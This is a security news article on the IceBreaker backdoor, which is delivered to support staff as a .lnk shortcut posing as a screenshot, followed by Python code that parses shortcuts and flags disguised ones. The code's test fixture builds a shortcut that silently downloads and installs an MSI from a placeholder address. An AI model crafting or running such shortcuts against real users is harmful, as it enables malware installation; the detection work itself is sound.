Social engineering is in demand once again; this time the targets are customer-support agents.
A hacking group has been targeting online game development companies with a previously unseen backdoor that researchers have dubbed "IceBreaker".
The Security Joes Incident Response team says the IceBreaker campaign relies on "a very specific social engineering technique" built around deceiving support staff. The attacker poses as a user who has run into a problem and sends the support agent a "screenshot" of the issue over the support chat. Because the agent's job is to help the user, they have little choice but to download and open the file, and in doing so they infect their own machine with the backdoor.
The group behind these attacks has not yet been identified. According to Security Joes, however, it has been using this approach since at least September 2022, and the only public sighting of IceBreaker before this report was a Twitter post by MalwareHunterTeam in October.
The malicious "image" is usually hosted on a fake website that imitates a popular image host, although the researchers have also seen the same files served from ordinary Dropbox storage.
The "image" is in fact a malicious ".lnk" file: a regular Windows shortcut whose target and command-line parameters carry the malicious command.
As the image above shows, the shortcut's icon has been changed to look innocuous. The shortcut contains a command that downloads an ".msi" payload from the attacker's server and installs it silently, without showing any user interface.
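The shortcut trick lends itself to a mechanical check: a ".lnk" file has a fixed 76-byte header (MS-SHLLINK) followed by optional StringData fields, so the embedded target, arguments, icon location and window mode can be pulled out and examined before anyone double-clicks. The Python below is an added example, not code from Security Joes or from the report; it parses those fields and applies a handful of heuristics (an image name carrying a .lnk suffix, a URL in the command line, silent msiexec switches, a minimised-window launch, an icon borrowed from a binary unrelated to the target). Those heuristics are this example's assumptions about what such a shortcut looks like, not published IceBreaker indicators, and the sample shortcut, the address 198.51.100.10 and the filename screenshot.png.lnk are constructed for the example.

```python
"""Added example: parse a Windows shell link (.lnk) and flag a shortcut posing as a
screenshot. Layout per MS-SHLLINK; the sample built in build_lnk() is constructed."""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target without a visible window

# StringData fields, in the order they appear in the file
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # character count, no terminator
        pos += 2
        raw = data[pos:pos + width * count]
        info[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
        pos += width * count
    return info


def build_lnk(relative_path=None, arguments=None, icon_location=None, show_command=1) -> bytes:
    """Construct a minimal Unicode .lnk from StringData only (fixture, not a real sample)."""
    values = {"relative_path": relative_path, "arguments": arguments, "icon_location": icon_location}
    flags, body = IS_UNICODE, b""
    for bit, name in STRING_FIELDS:
        text = values.get(name)
        if text is not None:
            flags |= bit
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    header = bytearray(HEADER_SIZE)              # remaining header fields stay zero
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 20, flags)
    struct.pack_into("<I", header, 60, show_command)
    return bytes(header) + body


def assess_lnk(filename: str, data: bytes) -> list:
    """Heuristics for a shortcut disguised as an image (assumptions of this example)."""
    info = parse_lnk(data)
    cmd = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    findings = []
    if re.search(r"\.(png|jpe?g|gif|bmp)\.lnk$", filename.lower()):
        findings.append("image name with .lnk suffix")
    if re.search(r"https?://", cmd):
        findings.append("URL in command line")
    if "msiexec" in cmd and re.search(r"\s/(q|qn|quiet)\b", cmd):
        findings.append("silent msiexec install")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("launched without a visible window")
    target = info.get("relative_path", "").lower().rsplit("\\", 1)[-1].split(".")[0]
    icon = info.get("icon_location", "").lower()
    if target and icon and target not in icon:
        findings.append("icon borrowed from an unrelated binary")
    return findings


if __name__ == "__main__":
    # Constructed sample: a shortcut that silently installs an MSI from a TEST-NET-2 address.
    sample = build_lnk(r"..\..\..\Windows\System32\msiexec.exe",
                       "/i http://198.51.100.10/update.msi /qn",
                       r"%SystemRoot%\System32\imageres.dll", SW_SHOWMINNOACTIVE)
    for finding in assess_lnk("screenshot.png.lnk", sample):
        print("-", finding)
```

A real shortcut usually also carries a LinkTargetIDList and LinkInfo block; the parser skips both by their size prefixes rather than interpreting them, which is enough to reach the arguments. Any one finding on its own is weak (plenty of legitimate installers call msiexec quietly), so treat the combination, not a single hit, as the signal.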
The MSI then drops "Port.exe", a 64-bit C++ executable, into "AppData\Local\Temp".
After closer analysis, Security Joes concluded that the payload is an entirely new backdoor written in Node.js. It gives the attackers the following capabilities:
extending the backdoor's built-in functions with plugins;
persisting the backdoor via Windows startup;
discovering running Windows processes;
stealing passwords and cookies from local storage, in particular Google Chrome's;
enabling a Socks5 reverse proxy;
exfiltrating files to a remote server over WebSockets;
running custom VBS scripts;
opening remote shell sessions.
If the target organization runs customer support in-house rather than outsourcing it to an external provider, the attackers can use the backdoor to steal credentials, move laterally through the internal network and expand their foothold there.
Little is known about IceBreaker so far, but Security Joes chose to publish the report and share all of the indicators of compromise (IoCs) they found so that defenders and security vendors can learn to detect and block the threat promptly.